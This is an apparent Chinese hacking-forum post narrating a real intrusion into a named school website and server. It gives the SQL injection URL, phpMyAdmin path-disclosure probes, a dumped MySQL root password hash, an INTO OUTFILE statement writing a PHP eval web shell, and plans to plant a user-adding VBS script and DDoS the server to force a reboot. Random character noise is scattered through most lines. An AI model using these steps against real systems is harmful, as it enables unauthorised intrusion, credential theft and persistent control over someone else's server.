第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
1 U, n5 y) t5 g4 V$ p. `( g0 y9 p发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
, { h7 c ~! k z
7 R3 s- w |! P. h" e
; B W% f, I/ b/ {
* J% a: z: F0 \$ F( ~常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
9 l+ [+ `% o ~2 D
9 ^/ v1 u% g, P9 Z7 S7 @那么想可以直接写入shell ,getshell有几个条件:" M" x6 P1 k! f& y M L
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ! `$ f& i; e% ~1 g8 `- _
% ?" l) s. n7 Z* y% y# X$ V试着爆绝对路径:
; T# P' k, r4 o+ t/ y E5 [1./phpMyAdmin/index.php?lang[]=1
) V( W" s) j. ?2./phpMyAdmin/phpinfo.php + Z5 |9 J: F+ x) C- t8 k [
3./load_file() * s9 r- Z8 u) @
4./phpmyadmin/themes/darkblue_orange/layout.inc.php % G3 }8 J- S! r# ]) I/ ~/ @8 e* [9 |
5./phpmyadmin/libraries/select_lang.lib.php
) I2 [" z& c, s. i6./phpmyadmin/libraries/lect_lang.lib.php # F3 ]4 b& W3 g$ a
7./phpmyadmin/libraries/mcrypt.lib.php
4 Y; P) |- F! I: Y" l% |8 A8./phpmyadmin/libraries/export/xls.php ; M4 o7 W, q2 q i! S2 s9 F
! `! P/ t' G4 \7 P2 }# ^7 z均不行........................... : B; ^- Z9 M( v5 f. a0 i
0 n9 @% P; `* k
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php % ?4 b# v, Q# e" d) ]
7 t5 N: u- D3 E# X权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin # G$ f4 n! l* ?' L. j- N
d3 }& u9 k, e# W4 R4 S& U. U. j5 |
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
5 \3 [' A1 X5 R. r) S6 S" w& A% M, m9 k4 p
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... , Q" k n) j5 Y: _% n: [) b; t7 b% ]
& Y: p& @3 [, K' H! }- q
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 8 Z; g; l. G: k1 B9 r
1 J1 h0 o4 g" [) i4 N phttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 5 }# D# Z6 p: q! q6 i
% T6 a. O: T- R8 D
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
" n) w! R' s1 }. v8 P& _" q
7 f* Q6 @! h" @: Q' ^成功读到root密码: 3 f9 l h1 _/ p8 `. i& t- L4 u
/ B: Z ^ K3 I: m: X) _. F1 p17---- r(0072) 4 L& C O& w: V
18---- o(006f)
3 v( }% c* L, `8 |& b+ V19---- o(006f) : G2 f* ^- I" s
20---- t(0074) ; C. ^6 f' I$ f/ O
21---- *(002a)
, g# S+ b4 [. ^2 n4 F* ?( H22---- 8(0038)
7 ?$ X) z" Z/ R# W# m23---- 2(0032) O+ j) C: E" D7 F
24---- E(0045)
' W: l8 v( o0 E) ^) X, Q25---- 1(0031) ; B1 ]) O- {: [' M3 `
26---- C(0043)
$ \8 ?/ X! z; a6 b: n27---- 5(0035)
. c5 f4 Z0 d* i2 N% T: @# o28---- 8(0038) 8 a) M) u) t! c y2 N
29---- 2(0032) 8 v. E0 C |: D; v
30---- 8(0038) . X# S0 A& G( r- F! _; X
31---- A(0041)
7 H" \" |& W1 N% l3 s6 [0 P' B32---- 9(0039)
" [0 _1 V, @8 Z- H$ E z33---- B(0042) * [: h7 [" s* S# |! u! c( R
34---- 5(0035) 0 C0 |! {. `/ [6 _& g
35---- 4(0034) 6 y! _1 n5 m* q" a4 M& b) g0 f
36---- 8(0038)
3 j$ `( r) C0 Y+ i37---- 6(0036) 5 P" P, r. a/ O- z* z; w
38---- 4(0034)
0 I7 C# `& j2 G; Z6 K1 {& V' A% n39---- 9(0039)
) d) q4 D9 F: }7 s40---- 1(0031)
% d/ `8 \2 Z: J" h41---- 1(0031)
: x7 U9 m- `3 ?& E% V }" m! L( H1 g- L- d3 ?42---- 5(0035)
6 K8 s$ I7 q; S5 y5 @2 ^43---- 3(0033) # K, e' i' J5 k% L& s; ]0 P
44---- 5(0035) + R: G5 H/ W' [% ~: D! T$ S
45---- 9(0039) 5 f* L3 J1 [2 W6 {( Z/ s5 I8 C9 }
46---- 8(0038)
1 w8 ?0 n0 `) x47---- F(0046)
' x% q" x+ s X: ~: ?7 [* a48---- F(0046) 0 I: D: h4 r# r0 D0 ^/ G: C
49---- 4(0034)
% U+ [% h( d9 j50---- F(0046)
6 i3 y8 M G- \$ M51---- 0(0030) 7 }) g) F# P% Q
52---- 3(0033)
, O0 R& @0 B* L. U' I53---- 2(0032) 8 s+ d- s. u( z9 B
54---- A(0041)
% ~# R' [0 }9 f" N55---- 4(0034) 9 }! v y! R1 M+ _7 [( l, {( h
56---- A(0041)
, j0 {! j; g6 q$ G6 J6 j! \1 z) D& P2 G57---- B(0042)
, ^) r1 w8 t% ^ |# k58---- *(0044)
) H n: q7 |% x5 B4 E3 z9 b9 v6 e59---- *(0035)
3 D+ H! L2 ^' a% S" k6 R) ^4 o60---- *(0041)
& b+ k! N; K m* P/ } {6 [61---- *0032) 9 w' @3 B# N& R. ?0 s
. I: a& a$ U- W# M% v6 m" X1 T1 a
解密后成功登陆phpmyamin
7 b% c/ c6 l; o r' Q8 }, @- f2 z - G+ N) s0 V2 P, C# x
6 S/ c0 a& Y- R
0 E; h- c9 x* S, ]6 W; s; l8 J; q8 x
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
$ W0 G$ ?) q0 j& h+ w) T# s0 d* F. e
: \) L% K7 E# {0 M+ F; U( Y成功执行,拿下shell,菜刀连接:
2 T4 x. C% ` K4 J- U
: C/ \$ V7 ]0 ~8 I, T1 \8 y服务器不支持asp,aspx,php提权无果...................
9 c! g7 D9 n( S0 L# [. j6 c7 E9 f w- j
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
" V- t% ?* y2 R' o/ A服务器上已经有个隐藏帐号了
4 @& H0 v r- E别名 administrators
! O3 w, o7 r1 B1 f) C9 H注释 管理员对计算机/域有不受限制的完全访问权
% \% ]% a/ ~$ c3 P U6 W. I成员 0 Y3 G& o6 S. v5 g( g" E: m
-------------------------------------------------------------------------------
# O- D5 i3 Y' I1 Nadmin
% D1 q5 H- _4 }: u1 z# v- zAdministrator
2 J' d$ H b1 gslipper$
9 S+ D! a* Y/ Ksqluser( {4 R* B7 P) G. T, m6 n( T: D% a' W4 c
命令成功完成。 # j$ _1 w+ H9 O% v5 K a3 x
+ F' e$ {; @' r7 A( e服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。6 Q% n8 Q+ P s4 _" i2 |# [
2 L# A; j& l! Z- o1 {1 d N, Qddos服务器重启,不然就只能坐等服务器重启了...............................
. {$ P5 u: L% B; S. x; n. X
' n4 g- ^3 U. f! v' Z ' A: k/ d1 u, C% \ _* a
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
